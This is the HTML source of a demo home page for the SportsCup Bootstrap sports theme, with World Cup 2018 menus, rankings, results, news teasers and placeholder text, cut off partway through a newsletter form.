<!DOCTYPE html>
<html lang="en">
    <head>
        <!-- Basic -->
        <meta charset="utf-8">
        <title>SportsCup - Bootstrap 4 Theme for Sports</title>
        <meta name="keywords" content="HTML5 Template" />
        <meta name="description" content="SportsCup - Bootstrap 4 Theme for Soccer And Sports">
        <meta name="author" content="iwthemes.com">

        <!-- Mobile Metas -->
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <!-- Theme CSS -->
        <link href="assets/css/main.css" rel="stylesheet" media="screen">

        <!-- Favicons -->
        <link rel="shortcut icon" href="img/icons/favicon.ico">
        <link rel="apple-touch-icon" href="img/icons/apple-touch-icon.png">
        <link rel="apple-touch-icon" sizes="72x72" href="img/icons/apple-touch-icon-72x72.png">
        <link rel="apple-touch-icon" sizes="114x114" href="img/icons/apple-touch-icon-114x114.png">
    </head>

    <body>

        <!-- layout-->
        <div id="layout">
            <!-- Header-->
            <header class="header-2">
                <!-- End headerbox-->
                <div class="headerbox">
                    <div class="container">
                        <div class="row justify-content-between align-items-center">
                            <!-- Logo-->
                            <div class="col col-xl-2">
                               <div class="logo">
                                   <a href="index.html" title="Return Home">
                                        <img src="img/logo.png" alt="Logo" class="logo_img">
                                    </a>
                               </div>
                            </div>
                            <!-- End Logo-->

                            <!-- Adds nav-->
                            <div class="col col-xl-10">
                                <!-- mainmenu-->
                                <nav class="mainmenu">
                                    <div class="container">
                                        <!-- Menu-->
                                        <ul class="sf-menu" id="menu">
                                            <li class="current">
                                                <a href="index.html">Home</a>
                                                <ul class="sub-current">
                                                    <li>
                                                        <a href="index.html">Home 1</a>
                                                    </li>
                                                    <li>
                                                        <a href="index-2.html">Home 2</a>
                                                    </li>
                                                    <li>
                                                        <a href="index-3.html">Home 3</a>
                                                    </li>
                                                    <li>
                                                        <a href="index-4.html">Home 4</a>
                                                    </li>
                                                    <li>
                                                        <a href="index-5.html">Home 5</a>
                                                    </li>
                                                    <li>
                                                        <a href="index-6.html">Home 6</a>
                                                    </li>
                                                </ul>
                                            </li>

                                            <li>
                                                <a href="#">World Cup</a>
                                                <div class="sf-mega">
                                                    <div class="row">
                                                         <div class="col-md-3">
                                                            <h5><i class="fa fa-trophy" aria-hidden="true"></i>World Cup</h5>
                                                            <ul>
                                                                <li><a href="table-point.html">Point Table</a></li>
                                                                <li><a href="fixtures.html">Fixtures</a></li>
                                                                <li><a href="groups.html">Groups</a></li>
                                                                <li><a href="news-left-sidebar.html">News</a></li>
                                                                <li><a href="contact.html">Contact Us</a></li>
                                                            </ul>
                                                        </div>

                                                        <div class="col-md-3">
                                                          <h5><i class="fa fa-users" aria-hidden="true"></i> Teams List</h5>
                                                          <div class="img-hover">
                                                             <img src="img/blog/1.jpg" alt="" class="img-responsive">
                                                             <div class="overlay"><a href="teams.html">+</a></div>
                                                          </div>
                                                        </div>

                                                        <div class="col-md-3">
                                                          <h5><i class="fa fa-futbol-o" aria-hidden="true"></i> Players List</h5>
                                                          <div class="img-hover">
                                                             <img src="img/blog/2.jpg" alt="" class="img-responsive">
                                                             <div class="overlay"><a href="players.html">+</a></div>
                                                          </div>
                                                        </div>

                                                        <div class="col-md-3">
                                                          <h5><i class="fa fa-gamepad" aria-hidden="true"></i> Results Info</h5>
                                                          <div class="img-hover">
                                                             <img src="img/blog/3.jpg" alt="" class="img-responsive">
                                                             <div class="overlay"><a href="results.html">+</a></div>
                                                          </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </li>

                                            <li class="current">
                                                <a href="teams.html">Teams</a>
                                                <ul class="sub-current">
                                                    <li>
                                                        <a href="teams.html">Teams List</a>
                                                    </li>
                                                    <li>
                                                        <a href="single-team.html">Single Team</a>
                                                    </li>
                                                </ul>
                                            </li>

                                            <li class="current">
                                                <a href="players.html">Players</a>
                                                <ul class="sub-current">
                                                    <li>
                                                        <a href="players.html">Players List</a>
                                                    </li>
                                                    <li>
                                                        <a href="single-player.html">Single Player</a>
                                                    </li>
                                                </ul>
                                            </li>

                                            <li>
                                                <a href="fixtures.html">Fixtures</a>
                                            </li>

                                            <li class="current">
                                                <a href="results.html">Results</a>
                                                <ul class="sub-current">
                                                    <li>
                                                        <a href="results.html">Results List</a>
                                                    </li>
                                                    <li>
                                                        <a href="single-result.html">Single Result</a>
                                                    </li>
                                                </ul>
                                            </li>

                                            <li>
                                                <a href="table-point.html">Point Table</a>
                                            </li>

                                            <li>
                                                <a href="groups.html">Groups</a>
                                            </li>

                                            <li>
                                                <a href="#">Features</a>
                                                <div class="sf-mega">
                                                    <div class="row">
                                                        <div class="col-md-3">
                                                            <h5>Features</h5>
                                                            <ul>
                                                                <li><a href="page-full-width.html">Full Width</a></li>
                                                                <li><a href="page-left-sidebar.html">Left Sidebar</a></li>
                                                                <li><a href="page-right-sidebar.html">Right Sidebar</a></li>
                                                                <li><a href="page-404.html">404 Page</a></li>
                                                                <li><a href="page-faq.html">FAQ</a></li>
                                                                <li><a href="sitemap.html">Sitemap</a></li>
                                                                <li><a href="page-pricing.html">Pricing</a></li>
                                                                <li><a href="page-register.html">Register Form</a></li>
                                                            </ul>
                                                        </div>
                                                        <div class="col-md-3">
                                                            <h5>Headers & Footers</h5>
                                                            <ul>
                                                                <li><a href="feature-header-footer-1.html">Header Version 1</a></li>
                                                                <li><a href="feature-header-footer-2.html">Header Version 2</a></li>
                                                                <li><a href="feature-header-footer-3.html">Header Version 3</a></li>
                                                                <li><a href="index-5.html">Header Version 4</a></li>
                                                                <li><a href="feature-header-footer-1.html#footer">Footer Version 1</a></li>
                                                                <li><a href="feature-header-footer-2.html#footer">Footer Version 2</a></li>
                                                                <li><a href="feature-header-footer-3.html#footer">Footer Version 3</a></li>
                                                            </ul>
                                                        </div>

                                                        <div class="col-md-3">
                                                            <h5>Pages</h5>
                                                            <ul>
                                                                <li><a href="page-about.html">About Us</a></li>
                                                                <li><a href="single-player.html">About Me</a></li>
                                                                <li><a href="services.html">Services</a></li>
                                                                <li><a href="single-team.html">Club Info</a></li>
                                                                <li><a href="single-result.html">Match Result</a></li>
                                                                <li><a href="table-point.html">Positions</a></li>
                                                            </ul>
                                                        </div>

                                                        <div class="col-md-3">
                                                            <h5>News</h5>
                                                            <ul>
                                                                <li>
                                                                    <a href="news-left-sidebar.html">News Lef Sidebar</a>
                                                                </li>
                                                                <li>
                                                                    <a href="news-right-sidebar.html">News Right Sidebar</a>
                                                                </li>
                                                                <li>
                                                                    <a href="news-no-sidebar.html">News No Sidebar</a>
                                                                </li>
                                                                <li>
                                                                    <a href="single-news.html">Single News</a>
                                                                </li>
                                                            </ul>
                                                        </div>
                                                        <i class="fa fa-trophy big-icon" aria-hidden="true"></i>
                                                    </div>
                                                </div>
                                            </li>

                                            <li>
                                                <a href="contact.html">Contact</a>
                                            </li>
                                        </ul>
                                        <!-- End Menu-->
                                    </div>
                                </nav>
                                <!-- End mainmenu-->

                                <!-- Call Nav Menu-->
                                <a class="mobile-nav" href="#mobile-nav"><i class="fa fa-bars"></i></a>
                                <!-- End Call Nav Menu-->
                            </div>
                            <!-- End nav Header-->
                        </div>
                    </div>
                </div>
                <!-- End headerbox-->
            </header>
            <!-- End Header-->

            <!-- Mobile Nav-->
            <div id="mobile-nav">
                <!-- Menu-->
                <ul>
                    <li>
                        <a href="index.html">Home</a>
                        <ul>
                           <li>
                                <a href="index-1.html">Home 1</a>
                            </li>
                            <li>
                                <a href="index-2.html">Home 2</a>
                            </li>
                            <li>
                                <a href="index-3.html">Home 3</a>
                            </li>
                            <li>
                                <a href="index-4.html">Home 4</a>
                            </li>
                            <li>
                                <a href="index-5.html">Home 5</a>
                            </li>
                            <li>
                                <a href="index-6.html">Home 6</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="#">World Cup</a>
                        <ul>
                            <li>
                               <a href="#">World Cup</a>
                                <ul>
                                    <li><a href="table-point.html">Point Table</a></li>
                                    <li><a href="fixtures.html">Fixtures</a></li>
                                    <li><a href="groups.html">Groups</a></li>
                                    <li><a href="news-left-sidebar.html">News</a></li>
                                    <li><a href="contact.html">Contact Us</a></li>
                                </ul>
                            </li>

                            <li><a href="teams.html">Teams List</a></li>
                            <li><a href="players.html">Players List</a></li>
                            <li><a href="results.html">Results List</a></li>
                        </ul>
                    </li>

                    <li>
                        <a href="teams.html">Teams</a>
                        <ul>
                            <li>
                                <a href="teams.html">Teams List</a>
                            </li>
                            <li>
                                <a href="single-team.html">Single Team</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="players.html">Players</a>
                        <ul>
                            <li>
                                <a href="players.html">Players List</a>
                            </li>
                            <li>
                                <a href="single-player.html">Single Player</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="fixtures.html">Fixtures</a>
                    </li>

                    <li>
                        <a href="results.html">Results</a>
                        <ul>
                            <li>
                                <a href="results.html">Results List</a>
                            </li>
                            <li>
                                <a href="single-result.html">Single Result</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="table-point.html">Point Table</a>
                    </li>

                    <li>
                        <a href="groups.html">Groups</a>
                    </li>

                    <li>
                        <a href="#">Features</a>
                        <ul>
                            <li>
                                <a href="#">Features</a>
                                <ul>
                                    <li><a href="page-full-width.html">Full Width</a></li>
                                    <li><a href="page-left-sidebar.html">Left Sidebar</a></li>
                                    <li><a href="page-right-sidebar.html">Right Sidebar</a></li>
                                    <li><a href="page-404.html">404 Page</a></li>
                                    <li><a href="page-faq.html">FAQ</a></li>
                                    <li><a href="sitemap.html">Sitemap</a></li>
                                    <li><a href="page-pricing.html">Pricing</a></li>
                                    <li><a href="page-register.html">Register Form</a></li>
                                </ul>
                            </li>

                            <li>
                                <a href="#">Headers & Footers</a>
                                <ul>
                                    <li><a href="feature-header-footer-1.html">Header Version 1</a></li>
                                    <li><a href="feature-header-footer-2.html">Header Version 2</a></li>
                                    <li><a href="feature-header-footer-3.html">Header Version 3</a></li>
                                    <li><a href="index-5.html">Header Version 4</a></li>
                                    <li><a href="feature-header-footer-1.html#footer">Footer Version 1</a></li>
                                    <li><a href="feature-header-footer-2.html#footer">Footer Version 2</a></li>
                                    <li><a href="feature-header-footer-3.html#footer">Footer Version 3</a></li>
                                </ul>
                            </li>
                            <li>
                                <a href="#">Pages</a>
                                <ul>
                                    <li><a href="page-about.html">About Us</a></li>
                                    <li><a href="single-player.html">About Me</a></li>
                                    <li><a href="feature-header-footer-2.html#footer">Services</a></li>
                                    <li><a href="single-team.html">Club Info</a></li>
                                    <li><a href="single-result.html">Match Result</a></li>
                                    <li><a href="table-point.html">Positions</a></li>
                                </ul>
                            </li>
                            <li>
                                <a href="#">News</a>
                                <ul>
                                    <li>
                                        <a href="news-left-sidebar.html">News Lef Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="news-right-sidebar.html">News Right Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="news-no-sidebar.html">News No Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="single-news.html">Single News</a>
                                    </li>
                                </ul>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="contact.html">Contact</a>
                    </li>
                </ul>
                <!-- End Menu-->
            </div>
            <!-- End Mobile Nav-->

            <!-- section-hero-->
            <div class="hero-header hero-bg" style="background:url(img/slide/3.jpg);">
                <div class="container">
                    <div class="row">
                        <div class="col-lg-12 no-margin">
                            <h1>FIFA WORLD CUP 2018</h1>
                        </div>
                        <div class="col-lg-12">
                            <div class="box-start">
                                <div class="row align-items-center">
                                    <div class="col-lg-4">
                                        <div class="info-match">
                                            <div class="row">
                                                <div class="col">
                                                    <h4>
                                                        <span>Starting Date</span>
                                                        30 JAN 2018
                                                    </h4>
                                                </div>
                                                <div class="col">
                                                    <h4>
                                                        <span>Luzhniki Stadium</span>
                                                        Moscow
                                                    </h4>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <div class="horizontal-next-teams">
                                            <div class="row align-items-center">
                                                <div class="col">
                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/colombia.png" alt="">
                                                        <span>Colombia</span>
                                                    </a>
                                                </div>
                                                <div class="col">
                                                    <strong>Vs</strong>
                                                </div>
                                                <div class="col">
                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/rusia.png" alt="">
                                                        <span>Rusia</span>
                                                    </a>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <div class="horizontal-next-counter">
                                            <div id="event-one" class="counter"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <!-- End section-hero-->

            <!-- Section Area - Content Central -->
            <section class="content-info">

                <!-- Dark Home -->
                <div class="dark-home paddings-50-50">
                    <div class="container">
                        <div class="row">
                            <!-- Club Ranking -->
                            <div class="col-lg-4">
                               <div class="club-ranking">
                                    <h5><a href="group-list.html">Club Ranking</a></h5>
                                    <div class="info-ranking">
                                        <ul>
                                            <li>
                                              <span class="position">
                                                  1
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/rusia.png" alt="">
                                                    Russia
                                                </a>
                                                <span class="points">
                                                    90
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  2
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/arabia.png" alt="">
                                                    Saudi Arabia
                                                </a>
                                                <span class="points">
                                                    86
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  3
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/egy.png" alt="">
                                                    Egypt
                                                </a>
                                                <span class="points">
                                                    84
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  4
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/uru.png" alt="">
                                                    Uruguay
                                                </a>
                                                <span class="points">
                                                  70
                                               </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  5
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/por.png" alt="">
                                                    Portugal
                                                </a>
                                                <span class="points">
                                                    67
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  6
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/esp.png" alt="">
                                                    Spain
                                                </a>
                                                <span class="points">
                                                    60
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  55
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/mar.png" alt="">
                                                    Morocco
                                                </a>
                                                <span class="points">
                                                    90
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  8
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/clubs-logos/irn.png" alt="">
                                                     IR Iran
                                                </a>
                                                <span class="points">
                                                    53
                                                </span>
                                            </li>
                                        </ul>
                                    </div>
                               </div>
                            </div>
                            <!-- End Club Ranking -->

                            <!-- recent-results -->
                            <div class="col-lg-4">
                               <div class="recent-results">
                                    <h5><a href="group-list.html">Recent Result</a></h5>
                                    <div class="info-results">
                                        <ul>
                                            <li>
                                                <span class="head">
                                                    Portugal Vs Spain <span class="date">27 Jun 2017</span>
                                                </span>

                                                <div class="goals-result">
                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/por.png" alt="">
                                                        Portugal
                                                    </a>

                                                    <span class="goals">
                                                        <b>2</b> - <b>3</b>
                                                    </span>

                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/esp.png" alt="">
                                                        Spain
                                                    </a>
                                                </div>
                                            </li>

                                            <li>
                                                <span class="head">
                                                    Rusia Vs Colombia <span class="date">30 Jun 2017</span>
                                                </span>

                                                <div class="goals-result">
                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/rusia.png" alt="">
                                                        Rusia
                                                    </a>

                                                    <span class="goals">
                                                        <b>2</b> - <b>3</b>
                                                    </span>

                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/colombia.png" alt="">
                                                         Colombia
                                                    </a>
                                                </div>
                                            </li>

                                            <li>
                                                <span class="head">
                                                    Uruguay Vs Portugal <span class="date">31 Jun 2017</span>
                                                </span>

                                                <div class="goals-result">
                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/uru.png" alt="">
                                                        Uruguay
                                                    </a>

                                                    <span class="goals">
                                                        <b>2</b> - <b>3</b>
                                                    </span>

                                                    <a href="single-team.html">
                                                        <img src="img/clubs-logos/por.png" alt="">
                                                         Portugal
                                                    </a>
                                                </div>
                                            </li>
                                        </ul>
                                    </div>
                               </div>
                            </div>
                            <!-- end recent-results -->

                            <!-- Top player -->
                            <div class="col-lg-4">
                               <div class="player-ranking">
                                    <h5><a href="group-list.html">Top player</a></h5>
                                    <div class="info-player">
                                        <ul>
                                            <li>
                                              <span class="position">
                                                  1
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/1.jpg" alt="">
                                                    Cristiano R.
                                                </a>
                                                <span class="points">
                                                    90
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  2
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/2.jpg" alt="">
                                                    Lionel Messi
                                                </a>
                                                <span class="points">
                                                    88
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  3
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/3.jpg" alt="">
                                                    Neymar
                                                </a>
                                                <span class="points">
                                                    86
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  4
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/4.jpg" alt="">
                                                    Luis Suárez
                                                </a>
                                                <span class="points">
                                                  80
                                               </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  5
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/5.jpg" alt="">
                                                    Gareth Bale
                                                </a>
                                                <span class="points">
                                                    76
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  6
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/6.jpg" alt="">
                                                    Sergio Agüero
                                                </a>
                                                <span class="points">
                                                    74
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  7
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/2.jpg" alt="">
                                                    Jamez R.
                                                </a>
                                                <span class="points">
                                                    70
                                                </span>
                                            </li>

                                            <li>
                                              <span class="position">
                                                  8
                                              </span>
                                               <a href="single-team.html">
                                                    <img src="img/players/1.jpg" alt="">
                                                     Falcao Garcia
                                                </a>
                                                <span class="points">
                                                    65
                                                </span>
                                            </li>
                                        </ul>
                                    </div>
                               </div>
                            </div>
                            <!-- End Top player -->
                        </div>
                    </div>
                </div>

                <!-- Content Central -->
                <div class="container padding-top">
                    <div class="row">

                        <!-- content Column Left -->
                        <div class="col-lg-6 col-xl-7">
                            <!-- Recent Post -->
                            <div class="panel-box">

                                <div class="titles">
                                    <h4>Recent News</h4>
                                </div>

                                <!-- Post Item -->
                                <div class="post-item">
                                    <div class="row">
                                        <div class="col-md-4">
                                            <div class="img-hover">
                                               <img src="img/blog/1.jpg" alt="" class="img-responsive">
                                               <div class="overlay"><a href="single-news.html">+</a></div>
                                            </div>
                                        </div>
                                        <div class="col-md-8">
                                            <h5><a href="single-news.html">Group Stage Breakdown</a></h5>
                                            <span class="data-info">January 3, 2014  / <i class="fa fa-comments"></i><a href="#">0</a></span>
                                            <p>While familiar with fellow European nation France, Hareide admits that South American side Peru.<a href="single-news.html">Read More [+]</a></p>
                                        </div>
                                   </div>
                                </div>
                                 <!-- End Post Item -->

                                 <!-- Post Item -->
                                <div class="post-item">
                                    <div class="row">
                                        <div class="col-md-4">
                                            <div class="img-hover">
                                               <img src="img/blog/2.jpg" alt="" class="img-responsive">
                                               <div class="overlay"><a href="single-news.html">+</a></div>
                                            </div>
                                        </div>
                                        <div class="col-md-8">
                                            <h5><a href="single-news.html">Russia 2018’s potential classic match-ups</a></h5>
                                            <span class="data-info">January 9, 2014  / <i class="fa fa-comments"></i><a href="#">5</a></span>
                                            <p>Our goal is very clear, it didn’t change after the draw. We should qualify for the knockout stage.<a href="single-news.html">Read More [+]</a></p>
                                        </div>
                                   </div>
                                </div>
                                 <!-- End Post Item -->

                                 <!-- Post Item -->
                                <div class="post-item">
                                    <div class="row">
                                        <div class="col-md-4">
                                            <div class="img-hover">
                                               <img src="img/blog/3.jpg" alt="" class="img-responsive">
                                               <div class="overlay"><a href="single-news.html">+</a></div>
                                            </div>
                                        </div>
                                        <div class="col-md-8">
                                            <h5><a href="single-news.html">World Cup rivalries reprised</a></h5>
                                            <span class="data-info">January  4, 2014  / <i class="fa fa-comments"></i><a href="#">3</a></span>
                                            <p>The outdoor exhibition on Manezhnaya Square comprises 11 figures that symbolise the main sites of interest.<a href="single-news.html">Read More [+]</a></p>
                                        </div>
                                   </div>
                                </div>
                                 <!-- End Post Item -->

                                 <!-- Post Item -->
                                <div class="post-item">
                                    <div class="row">
                                        <div class="col-md-4">
                                            <div class="img-hover">
                                               <img src="img/blog/4.jpg" alt="" class="img-responsive">
                                               <div class="overlay"><a href="single-news.html">+</a></div>
                                            </div>
                                        </div>
                                        <div class="col-md-8">
                                            <h5><a href="single-news.html">All set for your trip to Russia?</a></h5>
                                            <span class="data-info">January 8, 2014  / <i class="fa fa-comments"></i><a href="#">2</a></span>
                                            <p>Colombia play Japan on 19 June at the Mordovia Arena, where the piling and casting operations.<a href="single-news.html">Read More [+]</a></p>
                                        </div>
                                   </div>
                                </div>
                                 <!-- End Post Item -->
                            </div>
                            <!-- End Recent Post -->

                            <!-- Experts -->
                            <div class="panel-box">
                                <div class="titles">
                                    <h4>Best Players</h4>
                                </div>

                                <div class="row">
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/1.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html">Cristiano Ronaldo</a></h6>
                                        </div>
                                    </div>
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/2.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html">Lionel Messi</a></h6>
                                        </div>
                                    </div>
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/3.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html">Neymar</a></h6>
                                        </div>
                                    </div>
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/4.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html">Luis Suárez</a></h6>
                                        </div>
                                    </div>
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/5.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html"> Gareth Bale</a></h6>
                                        </div>
                                    </div>
                                    <div class="col-xs-6 col-sm-3 col-md-4 col-lg-4">
                                        <div class="box-info">
                                            <a href="single-player.html">
                                                <img src="img/players/6.jpg" alt="" class="img-responsive">
                                            </a>
                                            <h6 class="entry-title"><a href="single-player.html">Sergio Agüero</a></h6>
                                        </div>
                                    </div>

                                </div>
                            </div>
                            <!-- End Experts -->
                        </div>
                         <!-- End content Left -->

                        <!-- content Sidebar Center -->
                        <aside class="col-sm-6 col-lg-3 col-xl-3">
                            <!-- Locations -->
                            <div class="panel-box">
                                <div class="titles no-margin">
                                    <h4>Locations</h4>
                                </div>
                                <!-- Locations Carousel -->
                                <ul class="single-carousel">
                                    <li>
                                        <img src="img/locations/1.jpg" alt="" class="img-responsive">
                                        <div class="info-single-carousel">
                                            <h4>Saint Petersburg</h4>
                                            <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo cillum dolore eu fugiat nulla  sit amet, consectetur adipisicing elit, pariatur.</p>
                                        </div>
                                    </li>
                                    <li>
                                        <img src="img/locations/2.jpg" alt="" class="img-responsive">
                                        <div class="info-single-carousel">
                                            <h4>Ekaterinburg</h4>
                                            <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo cillum dolore eu fugiat nulla pariatur.</p>
                                        </div>
                                    </li>
                                    <li>
                                        <img src="img/locations/3.jpg" alt="" class="img-responsive">
                                        <div class="info-single-carousel">
                                            <h4>Nizhny Novgorod</h4>
                                            <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo cillum dolore eu fugiat nulla pariatur.</p>
                                        </div>
                                    </li>
                                </ul>
                                <!-- Locations Carousel -->
                            </div>
                            <!-- End Locations -->

                            <!-- Video presentation -->
                            <div class="panel-box">
                                <div class="titles no-margin">
                                    <h4>Presentation</h4>
                                </div>
                                <!-- Locations Video -->
                                <div class="row">
                                    <iframe src="https://www.youtube.com/embed/AfOlAUd7u4o" class="video"></iframe>
                                    <div class="info-panel">
                                        <h4>Rio de Janeiro</h4>
                                        <p>Lorem ipsum dolor sit amet, sit amet, consectetur adipisicing elit, elit, incididunt ut labore et dolore magna aliqua sit amet, consectetur adipisicing elit,</p>
                                    </div>
                                </div>
                                <!-- End Locations Video -->
                            </div>
                            <!-- End Video presentation-->

                            <!-- Widget img-->
                            <div class="panel-box">
                                <div class="titles no-margin">
                                    <h4>Widget Image</h4>
                                </div>
                                <img src="img/slide/1.jpg" alt="">
                                <div class="row">
                                   <div class="info-panel">
                                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit,  ut sit amet, consectetur adipisicing elit, labore et dolore.</p>
                                   </div>
                                </div>
                            </div>
                            <!-- End Widget img-->
                        </aside>
                        <!-- End content Sidebar Center -->

                        <!-- content Sidebar Right -->
                        <aside class="col-sm-6 col-lg-3 col-xl-2">
                            <!-- Diary -->
                            <div class="panel-box">
                                <div class="titles">
                                    <h4><i class="fa fa-calendar"></i>Diary</h4>
                                </div>

                                <!-- List Diary -->
                                <ul class="list-diary">
                                    <!-- Item List Diary -->
                                    <li>
                                        <h6>GROUP A <span>14 JUN 2018 - 18:00</span></h6>
                                        <ul class="club-logo">
                                            <li>
                                                <img src="img/clubs-logos/rusia.png" alt="">
                                                <span>RUSSIA</span>
                                            </li>
                                            <li>
                                                <img src="img/clubs-logos/arabia.png" alt="">
                                                <span>SAUDI ARABIA</span>
                                            </li>
                                        </ul>
                                    </li>
                                    <!-- End Item List Diary -->

                                    <!-- Item List Diary -->
                                    <li>
                                        <h6>GROUP E <span>22 JUN 2018 - 15:00</span></h6>
                                        <ul class="club-logo">
                                            <li>
                                                <img src="img/clubs-logos/bra.png" alt="">
                                                <span>BRAZIL</span>
                                            </li>
                                            <li>
                                                <img src="img/clubs-logos/costa-rica.png" alt="">
                                                <span>COSTA RICA</span>
                                            </li>
                                        </ul>
                                    </li>
                                    <!-- End Item List Diary -->

                                    <!-- Item List Diary -->
                                    <li>
                                        <h6>GROUP H <span>19 JUN 2018 - 15:00</span></h6>
                                        <ul class="club-logo">
                                            <li>
                                                <img src="img/clubs-logos/colombia.png" alt="">
                                                <span>COLOMBIA</span>
                                            </li>
                                            <li>
                                                <img src="img/clubs-logos/japan.png" alt="">
                                                <span>JAPAN</span>
                                            </li>
                                        </ul>
                                    </li>
                                    <!-- End Item List Diary -->

                                    <!-- Item List Diary -->
                                    <li>
                                        <h6>GROUP C <span>16 JUN 2018 - 15:00</span></h6>
                                        <ul class="club-logo">
                                            <li>
                                                <img src="img/clubs-logos/fra.png" alt="">
                                                <span>FRANCE</span>
                                            </li>
                                            <li>
                                                <img src="img/clubs-logos/aus.png" alt="">
                                                <span>AUSTRALIA</span>
                                            </li>
                                        </ul>
                                    </li>
                                    <!-- End Item List Diary -->
                                </ul>
                                <!-- End List Diary -->
                            </div>
                            <!-- End Diary -->

                            <!-- Adds Sidebar -->
                            <div class="panel-box">
                               <div class="titles no-margin">
                                    <h4><i class="fa fa-link"></i>Cta</h4>
                                </div>
                                <a href="http://themeforest.net/user/iwthemes/portfolio?ref=iwthemes" target="_blank">
                                    <img src="img/adds/sidebar.png" class="img-responsive" alt="">
                                </a>
                            </div>
                            <!-- End Adds Sidebar -->
                        </aside>
                        <!-- End content Sidebar Right -->

                    </div>
                </div>
                <!-- End Content Central -->

                <!-- Newsletter -->
                <div class="section-newsletter no-margin">
                    <div class="container">
                        <div class="row">
                            <div class="col-md-12">
                                <div class="text-center">
                                    <h2>Enter your e-mail and <span class="text-resalt">subscribe</span> to our newsletter.</h2>
                                    <p>Duis non lorem porta,  eros sit amet, tempor sem. Donec nunc arcu, semper a tempus et, consequat.</p>
                                </div>
                                <form id="newsletterForm" action="php/mailchip/newsletter-subscribe.php">
                                    <div class="row">
                                        <div class="col-md-6">
                                            <div class="input-group">
                                                <span class="input-group-addon">
                                                    <i class="fa fa-envelope"></i>
                                                </span>
                                                <input class="form-control" placeholder="Your Name" name="name"  type="text" required="required">
                                            </div>
                                        </div>
                                        <div class="col-md-6">
                                            <div class="input-group">
                                                <span class="input-group-addon">
                                                    <i class="fa fa-envelope"></i>
                                                </span>
                                                <input class="form-control" placeholder="Your  Email" name="email"  type="email" required="required">
                                                <span class="input-group-btn">
